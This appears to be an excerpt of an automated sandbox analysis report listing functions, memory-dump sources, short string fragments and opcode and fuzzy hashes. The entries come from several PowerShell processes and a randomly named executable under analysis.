Source File: 00000019.00000002.3322599606.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848e0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22616a004a074dddaf3d31aad68f5b615ce6b74a3205ca2e354091b3d8094c2a
Instruction ID: 245f2160286cd1fbf7032bac9bf99ae7e368ae4d225c25b25e94307318fe0955
Opcode Fuzzy Hash: 22616a004a074dddaf3d31aad68f5b615ce6b74a3205ca2e354091b3d8094c2a
Instruction Fuzzy Hash: 7741C07180DBC54FE7569B2998459523FB0FF53360B1505EFD088CB1A3E629A846C792

Function 00007FF848F297A8 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3328882043.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea3efc1cacdba1b4704b1231573138bc322c3baea12c64d84fe20e0338ae193
Instruction ID: b6da91d9ba61c4f43ee1263adcb7a079d684dda5d59a44eb430d828cd53da47e
Opcode Fuzzy Hash: dea3efc1cacdba1b4704b1231573138bc322c3baea12c64d84fe20e0338ae193
Instruction Fuzzy Hash: CB31B53191CB4C8FDB1CDB5CA80A6A97BE0FB98711F00422FE449D3651CB71A855CBC2

Function 00007FF848F2A49C Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3328882043.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a04abf5930e55d1c98d125de755680bac93d8977a71548b8aecbb5916fe4bb6c
Instruction ID: 9563956150fb3c8267397c997cc9d15b676ba515e3e0aa48359d91866cb5a47e
Opcode Fuzzy Hash: a04abf5930e55d1c98d125de755680bac93d8977a71548b8aecbb5916fe4bb6c
Instruction Fuzzy Hash: 1221277080D7884FEB099BA89C4AAF97FB4EF53320F04419FD445DB1A3DA796846CB61

Function 00007FF848F233B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3328882043.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46

Function 00007FF848F2A0FB Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3328882043.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98db2cb0758dfd9a3e2b2a4396a4e15c08747e8a9ba6bfcee7873d036f15ee79
Instruction ID: 6fafe57ca77fa413f5294ed15a0362556d5c24803228349e63807fc02281a19e
Opcode Fuzzy Hash: 98db2cb0758dfd9a3e2b2a4396a4e15c08747e8a9ba6bfcee7873d036f15ee79
Instruction Fuzzy Hash: 1BF0C83690D98D4FD795FF2CA8550E57F90EF65251F4402B7D40CC7092EF269848CB81

Function 00007FF848FF4400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3335714242.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848ff0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 533ccc83d6c165f55add36e1702d25c2c0c1cdeab2a6df2fc2f651f8baf93daf
Instruction ID: 234dead4e732fed3aecd91cc5bfabaa387eb77d5ef1c18fc37e3d1596731aef6
Opcode Fuzzy Hash: 533ccc83d6c165f55add36e1702d25c2c0c1cdeab2a6df2fc2f651f8baf93daf
Instruction Fuzzy Hash: 36F0B832A0C5448FD758EB0CE4448A8B3E0FF04320F1900B7E209EB0A3DB2AAC608765

Function 00007FF848F26220 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3328882043.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 210edf648796d7c86860a932b47c4dc596b9b6f40a809f27c39f20889bb66d32
Instruction ID: 583e67bcb568e2a0c964aa7638ce66b51f964fc757a18bb01689bd94c50f42e1
Opcode Fuzzy Hash: 210edf648796d7c86860a932b47c4dc596b9b6f40a809f27c39f20889bb66d32
Instruction Fuzzy Hash: 7EE0B635814A4C8F8B44EF18D8099EA77A0FB68315B01425BB81ED7160DB31AA98CBC2

Non-executed Functions

Function 00007FF848FF7CED Relevance: 5.5, Strings: 4, Instructions: 453COMMON

Download Yara Rule

Strings

D$I, xrefs: 00007FF848FF7EC3
D$I, xrefs: 00007FF848FF8003
, xrefs: 00007FF848FF7D71
H, xrefs: 00007FF848FF7DE9

Memory Dump Source

Source File: 00000019.00000002.3335714242.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848ff0000_powershell.jbxd

Similarity

API ID:
String ID: $ D$I$ D$I$H
API String ID: 0-400985990
Opcode ID: 9b440e44e9d1a8acbf90da3902890d74ea09866a0b2ca6349a0b5c987dc3f908
Instruction ID: 594938f7d0d8718e51cb544e0506281bf6bb10e8ca93dea083a622fb0a5e0551
Opcode Fuzzy Hash: 9b440e44e9d1a8acbf90da3902890d74ea09866a0b2ca6349a0b5c987dc3f908
Instruction Fuzzy Hash: E5D11471D0EAC95FE756AB2898456B5BFA1EF52360F0901FBD18CC70D3DB189806C3A6

Function 00007FF848F28BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

M_^F, xrefs: 00007FF848F28C7A
M_^7, xrefs: 00007FF848F28C12
M_^J, xrefs: 00007FF848F28C8A
M_^4, xrefs: 00007FF848F28BFA

Memory Dump Source

Source File: 00000019.00000002.3328882043.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f20000_powershell.jbxd

Similarity

API ID:
String ID: M_^4$M_^7$M_^F$M_^J
API String ID: 0-622050427
Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
Instruction ID: 4b251d57f47bb37acb7270bcb3fcd5e7a9f7ff78876cdeb73e676b5544b6a454
Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
Instruction Fuzzy Hash: 6C213B7761A465DED3427B7DB8045DA3750DF942B8B8503B2E098CF083FE1C70868AD4

Analysis Process: powershell.exePID: 7980, Parent PID: 7584COMMON

Executed Functions

Function 00007FF849006605 Relevance: 7.9, Strings: 6, Instructions: 431COMMON

Download Yara Rule

Strings

X71K, xrefs: 00007FF8490067FD
(B%I, xrefs: 00007FF8490067C3
(B%I, xrefs: 00007FF849006974
(B%I, xrefs: 00007FF8490066ED
(B%I, xrefs: 00007FF849006858
(B%I, xrefs: 00007FF84900678C

Memory Dump Source

Source File: 0000001B.00000002.3311874622.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: (B%I$(B%I$(B%I$(B%I$(B%I$X71K
API String ID: 0-2795533080
Opcode ID: 2b88e1a94a44e70ed06a7d8dd3378c879f130598dd3e09612eaa277180db672f
Instruction ID: 39470e38a19616dc7d4b5b5dfde9f9c39df5de3b7bfd44e65304eb8ca6667809
Opcode Fuzzy Hash: 2b88e1a94a44e70ed06a7d8dd3378c879f130598dd3e09612eaa277180db672f
Instruction Fuzzy Hash: 89D13531D0EACA5FEB69EF2868155B57BA2EF16794F0802FBD04DD7083EA18D805C351

Function 00007FF849004073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

8>%I, xrefs: 00007FF84900413A

Memory Dump Source

Source File: 0000001B.00000002.3311874622.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: 8>%I
API String ID: 0-3722309147
Opcode ID: 9a48b7cde0af532fa0156e9cca9a5aee86f2e434280aac557b2325e96944630b
Instruction ID: 5ded61fe8f5387a4cb982bf05dad52ceb1b8a1ae18d6867394e8aac1af5b9707
Opcode Fuzzy Hash: 9a48b7cde0af532fa0156e9cca9a5aee86f2e434280aac557b2325e96944630b
Instruction Fuzzy Hash: 4F511932E0DA8A4FEBA9EE1C64116B577E2EF94260F5801FAC05DC7193FE24EC158349

Function 00007FF8490040BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

8>%I, xrefs: 00007FF84900413A

Memory Dump Source

Source File: 0000001B.00000002.3311874622.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: 8>%I
API String ID: 0-3722309147
Opcode ID: 1f4510a48405aa3de3ae6daab0db059d23faec4fe8b9277f21204660c978c618
Instruction ID: 075ffae091cee43819dc1a557b2e62e1ec41c03b13c97f89b06fe530a0c42c47
Opcode Fuzzy Hash: 1f4510a48405aa3de3ae6daab0db059d23faec4fe8b9277f21204660c978c618
Instruction Fuzzy Hash: 1E21D232E0D9874FEBB9EE1864505B476D6EF643A0B5901FAC01DC71E7FE28EC148249

Function 00007FF848E1E380 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.3294108090.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848e1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 709d78d45627590cc1441c26fa0f922bbaa406915f18356936b2ad68f3b087ca
Instruction ID: d4f13f30fe35307b6aec312e32efe09b9bf0650e974de417396c0caa0f35b9ed
Opcode Fuzzy Hash: 709d78d45627590cc1441c26fa0f922bbaa406915f18356936b2ad68f3b087ca
Instruction Fuzzy Hash: 3341147080DBC54FE79A9B2898419523FB0FF52354F1501EFE089CB1A3DB25E84AC792

Function 00007FF848F397A8 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.3302111944.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c285b333352cee2e91d20400b5b14da32ce19e72b2e9293d4ccb64cb40566a45
Instruction ID: 0a1950d8a70e96462046d422de61919c4a2115c56ac3ce57802c2ae4d1216021
Opcode Fuzzy Hash: c285b333352cee2e91d20400b5b14da32ce19e72b2e9293d4ccb64cb40566a45
Instruction Fuzzy Hash: 8031B13091CB4C8FDB1CDB5CA80A6A97BE0FB99721F00422FE449D3651CB71A856CBC6

Function 00007FF848F3A49C Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.3302111944.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55b9bcc936ab07b732e8a434a79bbd3b3b0ac7650b471d0133b29f1b129588c6
Instruction ID: 903a2c9a3c9580542fdf28d820aeaeb9cbb420023c9059c3173e652ca4e555e1
Opcode Fuzzy Hash: 55b9bcc936ab07b732e8a434a79bbd3b3b0ac7650b471d0133b29f1b129588c6
Instruction Fuzzy Hash: 3521297080D7884FE719DBA89C4AAB97FE4DF53330F04419FD485CB1A3D668644AC761

Function 00007FF848F333B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.3302111944.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
Opcode Fuzzy Hash: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

Function 00007FF848F3A0FB Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.3302111944.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb85842e3221ca806c1a1455705806485c5b4852389de98b9b03187fe8d90a1
Instruction ID: 967d011094c76a1c26a73782d6c022a67f2f7976e304ee73158ae3c8633f6d11
Opcode Fuzzy Hash: efb85842e3221ca806c1a1455705806485c5b4852389de98b9b03187fe8d90a1
Instruction Fuzzy Hash: C7F0A47690CEC94FDB82FB2898550E97F90EF66251F0400ABD448C7092EA2658488B82

Function 00007FF849004400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.3311874622.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf9d73a936417d8be0e4f5e62592c1f574ef4ce55d322eccba65270dc4215f7
Instruction ID: 317667df3d109ec0bf8038a5f2bc6961a5fe3a97c2f8e3cbb929330d697cb5d7
Opcode Fuzzy Hash: aaf9d73a936417d8be0e4f5e62592c1f574ef4ce55d322eccba65270dc4215f7
Instruction Fuzzy Hash: D7F0B832A0C5848FDB68EF0CE4448A8B3E0FF04321B1900F6E109CB0A3EB26EC408765

Function 00007FF848F36220 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.3302111944.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cb2d37325abad04377565457580ed9c79d2bd60d35ce1e974bb19a2f1396bb0
Instruction ID: f581fa66d7f7a9e5582a99c2bf8fbd628d5e2b4e2c87ead8d0a0f6be868682a2
Opcode Fuzzy Hash: 1cb2d37325abad04377565457580ed9c79d2bd60d35ce1e974bb19a2f1396bb0
Instruction Fuzzy Hash: 05E0B635814A4C8F8B45EF18D8099EA77A0FB68305B01425BB81ED7160DB31AA98CBC2

Non-executed Functions

Function 00007FF848F38BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

L_^7, xrefs: 00007FF848F38C12
L_^4, xrefs: 00007FF848F38BFA
L_^J, xrefs: 00007FF848F38C8A
L_^F, xrefs: 00007FF848F38C7A

Memory Dump Source

Source File: 0000001B.00000002.3302111944.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID: L_^4$L_^7$L_^F$L_^J
API String ID: 0-3225005683
Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
Instruction ID: 0907d21456b919f780f717bd5e1c1cb1acc8cc2b6eeb632774ad829765d359f1
Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
Instruction Fuzzy Hash: A52126B761A025AED3417BBDB8045EE3750DF942B8B4552B3D2988F043EB1C70868AE4

Analysis Process: powershell.exePID: 7988, Parent PID: 7584COMMON

Executed Functions

Function 00007FF848FD6605 Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

(B"I, xrefs: 00007FF848FD67C3
(B"I, xrefs: 00007FF848FD6858
(B"I, xrefs: 00007FF848FD6974
(B"I, xrefs: 00007FF848FD66ED
(B"I, xrefs: 00007FF848FD678C

Memory Dump Source

Source File: 0000001C.00000002.3344087945.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848fd0000_powershell.jbxd

Similarity

API ID:
String ID: (B"I$(B"I$(B"I$(B"I$(B"I
API String ID: 0-3570690463
Opcode ID: 416d4ea8a6d5ab73bdccdd0fabeb565ce8e0b272c783a90230f5f56fa3bd19c4
Instruction ID: 3d4a64c5bce2a53db5ab699b3d154ea5fe6b18011bc1d5fd876daa97ef407763
Opcode Fuzzy Hash: 416d4ea8a6d5ab73bdccdd0fabeb565ce8e0b272c783a90230f5f56fa3bd19c4
Instruction Fuzzy Hash: 7AD12231D0EA8A5FEB99AB2858145B57BE1EF16390F1801FAD14ECB0D3EB1CA805C795

Function 00007FF848FD3FF8 Relevance: 4.4, Strings: 3, Instructions: 609COMMON

Download Yara Rule

Strings

8>"I, xrefs: 00007FF848FD413A
p>"I, xrefs: 00007FF848FD43ED
8>"I, xrefs: 00007FF848FD4251

Memory Dump Source

Source File: 0000001C.00000002.3344087945.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848fd0000_powershell.jbxd

Similarity

API ID:
String ID: 8>"I$8>"I$p>"I
API String ID: 0-133172543
Opcode ID: 4baa7d08d9d236d2279b8ad1e3870750e85fc78492e4d4754583d8eff24330a2
Instruction ID: 355380e3a659648abab64ce2872eaa69979cc2216afb93db0ceea743ac9eecf6
Opcode Fuzzy Hash: 4baa7d08d9d236d2279b8ad1e3870750e85fc78492e4d4754583d8eff24330a2
Instruction Fuzzy Hash: F5022732D0DBCA4FE356A72858155B57BE1EF66260F0901FBC18EC71D3DA18AC068766

Function 00007FF848FD40BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

8>"I, xrefs: 00007FF848FD413A

Memory Dump Source

Source File: 0000001C.00000002.3344087945.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848fd0000_powershell.jbxd

Similarity

API ID:
String ID: 8>"I
API String ID: 0-2459728092
Opcode ID: 454275d2d72ae77d038e6cf200dad6e736b2ea438270e035049b507d09c4f7b2
Instruction ID: 570a45867c2f9f9402e5f3656b274529879fdcda776f04a777d04c9b21ae0530
Opcode Fuzzy Hash: 454275d2d72ae77d038e6cf200dad6e736b2ea438270e035049b507d09c4f7b2
Instruction Fuzzy Hash: B021F032E0D98B4FE7AAEB18545117462D2FF742A0F5901BAC21EC71E2CF18EC048A4A

Function 00007FF848DEE380 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3332436858.00007FF848DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848ded000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1be22f21320d2bb5c07cddd73f71fa82732ff52afe9261fdd6567deb3436b556
Instruction ID: c07599d38060f0a9340cd18f3909a68044be16809ce66aaf5381c50941f6300f
Opcode Fuzzy Hash: 1be22f21320d2bb5c07cddd73f71fa82732ff52afe9261fdd6567deb3436b556
Instruction Fuzzy Hash: 1B41233080EBC44FE7569B289845A623FF0EF52355F1501EFD088CB1A7D729E84AC792

Function 00007FF848F09798 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3338500459.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 476eda62e3e9e7a55740a9282cf3ac70a2ef3dad62d3e1647f15d2ad64227623
Instruction ID: 95dabdf94169fa53a0557ef0fb165c551ee6fd997198df6e5bf2a35d8e3bcccb
Opcode Fuzzy Hash: 476eda62e3e9e7a55740a9282cf3ac70a2ef3dad62d3e1647f15d2ad64227623
Instruction Fuzzy Hash: A431C33191CA488FDB18DB5CA8066B97BE0FB99711F00422FE44993652DB70A855CBC6

Function 00007FF848F0A49C Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3338500459.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 289f603337f2953a238c4b44ac1c025ad5efabee11ab053fa1ba2b56e1def843
Instruction ID: 7a9d78f6f9211448f24cdab348e35526aa3703258546d010cbe4ba1467469c87
Opcode Fuzzy Hash: 289f603337f2953a238c4b44ac1c025ad5efabee11ab053fa1ba2b56e1def843
Instruction Fuzzy Hash: B621297080C7884FDB098B688C4AAF97FF4EB53320F04419BD445DB262D6785846CB61

Function 00007FF848F033B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3338500459.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9895435140380c782189f81496fffaa590a70fd196a779c416207eeb9efb34d6
Instruction ID: 7751a646eaf869edea33559e4a2383cdbafb38eb3a9baaa8760fd3dac5d19060
Opcode Fuzzy Hash: 9895435140380c782189f81496fffaa590a70fd196a779c416207eeb9efb34d6
Instruction Fuzzy Hash: DE01677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056EE58AC3695DB36E882CB45

Function 00007FF848F0A0FB Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3338500459.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 223d459a76025fd9f77ea532cc6e7c37676db01a502d9813fedad8cc54cf7135
Instruction ID: dfbe773fd9af5c1e2501e78a93f4dd5e1ad125d6f3687be490dfcf31e82388d5
Opcode Fuzzy Hash: 223d459a76025fd9f77ea532cc6e7c37676db01a502d9813fedad8cc54cf7135
Instruction Fuzzy Hash: 38F0E93651CA8C4FCB85EF2C98690E97FA0FFA6211B0501BBD548C7161EB208849C7C2

Function 00007FF848FD4404 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3344087945.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848fd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80db7dcc1efebbf48a0dbc17c99ea33b3471e74d134de2bf1f0253c3f13cc235
Instruction ID: 257ba4c9ff10f40cb080ccc53766cff00e8c34de21cd8ad2f0fa9eff95cd0677
Opcode Fuzzy Hash: 80db7dcc1efebbf48a0dbc17c99ea33b3471e74d134de2bf1f0253c3f13cc235
Instruction Fuzzy Hash: 9DF0E23190C5448FD754FB08E4448A8B3E0FF06321F0500F6D14AC7093D725AC91CB54

Non-executed Functions

Function 00007FF848F08BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

O_^F, xrefs: 00007FF848F08C7A
O_^J, xrefs: 00007FF848F08C8A
O_^7, xrefs: 00007FF848F08C12
O_^4, xrefs: 00007FF848F08BFA

Memory Dump Source

Source File: 0000001C.00000002.3338500459.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f00000_powershell.jbxd

Similarity

API ID:
String ID: O_^4$O_^7$O_^F$O_^J
API String ID: 0-875994666
Opcode ID: fc36652a01fde3d68541ef6407f4994e1d7447276bdf42ee148701f13201db76
Instruction ID: 8bd8163f0f9ae516a15f916a4231b8f7fb71d175f1a7c6e4fa1c9a0ae69dd810
Opcode Fuzzy Hash: fc36652a01fde3d68541ef6407f4994e1d7447276bdf42ee148701f13201db76
Instruction Fuzzy Hash: E521297762A025DED3417B7DB8045DA3750DFD427AB4502B2D19E8F243EA1C708686E4

Analysis Process: DtJTopEKFGnyRQt.exePID: 8188, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF8494AE5F1 Relevance: 30.1, Strings: 23, Instructions: 1323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

84<I, xrefs: 00007FF8494AEC95
84<I, xrefs: 00007FF8494AEDA0
84<I, xrefs: 00007FF8494AE985
84<I, xrefs: 00007FF8494AEAAD
84<I, xrefs: 00007FF8494AE969
84<I, xrefs: 00007FF8494AEC47
84<I, xrefs: 00007FF8494AECFF
84<I, xrefs: 00007FF8494AEEA9
84<I, xrefs: 00007FF8494AF0E6
84<I, xrefs: 00007FF8494AEBD4
84<I, xrefs: 00007FF8494AEF18
84<I, xrefs: 00007FF8494AEDBC
84<I, xrefs: 00007FF8494AE89C
84<I, xrefs: 00007FF8494AF0CA
84<I, xrefs: 00007FF8494AE8E5
84<I, xrefs: 00007FF8494AE8C9
84<I, xrefs: 00007FF8494AEA62
84<I, xrefs: 00007FF8494AF314
84<I, xrefs: 00007FF8494AF22C
84<I, xrefs: 00007FF8494AEB9D
84<I, xrefs: 00007FF8494AEFD0
84<I, xrefs: 00007FF8494AEB05
84<I, xrefs: 00007FF8494AEF66

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: 84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I$84<I
API String ID: 0-1917339039
Opcode ID: 1629ebc9ca28e5023a02843886c6274cc77f9f995c118d0089df73fc4cf39dd3
Instruction ID: 833e18aadffd9cb2880e3016dc41224a398c93db47386826f7829d1f9232566e
Opcode Fuzzy Hash: 1629ebc9ca28e5023a02843886c6274cc77f9f995c118d0089df73fc4cf39dd3
Instruction Fuzzy Hash: E692E331A0CA498FDBA9FF28C499AB573E1FF64350B0441A9D44EC7192DE28ED85CB91

Function 00007FF848F4ADFD Relevance: 4.3, Strings: 1, Instructions: 3033COMMON

Download Yara Rule

Strings

rK_H, xrefs: 00007FF848F4B273

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f4a000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: rK_H
API String ID: 0-3650706707
Opcode ID: fb7783502db39ab94165d82667f36ffb70b4927d29f44a11893a20703d3ab998
